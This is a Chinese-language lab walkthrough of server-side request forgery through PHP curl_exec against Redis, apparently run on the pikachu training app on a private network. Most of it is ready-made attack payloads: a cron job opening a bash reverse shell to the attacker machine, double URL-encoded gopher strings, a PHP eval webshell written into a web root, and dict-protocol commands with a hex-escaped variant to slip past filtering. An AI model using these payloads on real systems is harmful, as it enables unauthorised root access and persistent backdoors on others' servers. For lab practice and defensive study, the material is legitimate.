SSRF漏洞拓展目录

  • SSRF漏洞拓展
    • curl_exec函数
      • 一、ssrf配合gopher协议反弹shell
      • 二、ssrf配合gopher协议写马
      • 三、ssrf配合gopher协议ssh免密登录
      • 四、ssrf配合dict协议反弹shell

curl_exec函数一、ssrf配合gopher协议反弹shell

实验环境:

(1)192.168.142.201     #redis服务器(2)192.168.142.133     #攻击机(3)192.168.142.1       #SSRF靶机

1、利用定时任务构造反弹shell

set xx "\n* * * * * bash -i >& /dev/tcp/192.168.142.133/8888 0>&1\n"config set dir /var/spool/cronconfig set dbfilename rootsave

2、进行URL编码

%73%65%74%20%78%78%20%22%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%34%32%2e%31%33%33%2f%38%38%38%38%20%30%3e%26%31%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%76%61%72%2f%73%70%6f%6f%6c%2f%63%72%6f%6e%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%72%6f%6f%74%0a%73%61%76%65

3、然后把%0a换成%0d%0a,最后再加上%0d%0a,再进行一次url编码

%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%31%25%33%33%25%33%33%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

4、对参数的gopher协议进行编码

gopher://192.168.142.201:6379/_编码后:gopher%3a%2f%2f192.168.142.201%3a6379%2f_

5、拼接成最后的payload

http://192.168.142.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%31%25%33%33%25%33%33%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

6、攻击机器开启监听,成功反弹

二、ssrf配合gopher协议写马

1、构造一句话木马

set xx "\n\n"config set dir /www/admin/localhost_80/wwwrootconfig set dbfilename test.phpsave

2、进行URL编码

%73%65%74%20%78%78%20%22%5c%6e%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%74%65%73%74%5d%29%3b%3f%3e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%77%77%77%2f%61%64%6d%69%6e%2f%6c%6f%63%61%6c%68%6f%73%74%5f%38%30%2f%77%77%77%72%6f%6f%74%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%74%65%73%74%2e%70%68%70%0a%73%61%76%65

3、然后把%0a换成%0d%0a,最后再加上%0d%0a,再进行一次url编码

%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%37%34%25%36%35%25%37%33%25%37%34%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

4、对参数的gopher协议进行编码

gopher://192.168.142.201:6379/_编码后:gopher%3a%2f%2f192.168.142.201%3a6379%2f_

5、拼接成最后的payload

http://192.168.142.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%37%34%25%36%35%25%37%33%25%37%34%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

6、用webshell工具连接成功

三、ssrf配合gopher协议ssh免密登录

思路差不多。公钥编码后会特别长,就不粘贴出来了。

四、ssrf配合dict协议反弹shell

1、修改文件名为root

dict://192.168.142.201:6379/config:set:dbfilename root

2、修改存储路径为/var/spool/cron

dict://192.168.142.201:6379/config:set:dir:/var/spool/cron

3、写入反弹shell

dict://192.168.142.201:6379/set:test:"\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.142.133/8888 0>&1\n\n"如果被转义了可以尝试16进制编码dict://192.168.142.201:6379/set:test:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.142.133/8888\x200\x3e\x261\n\n"

4、保存

dict://192.168.142.201:6379/save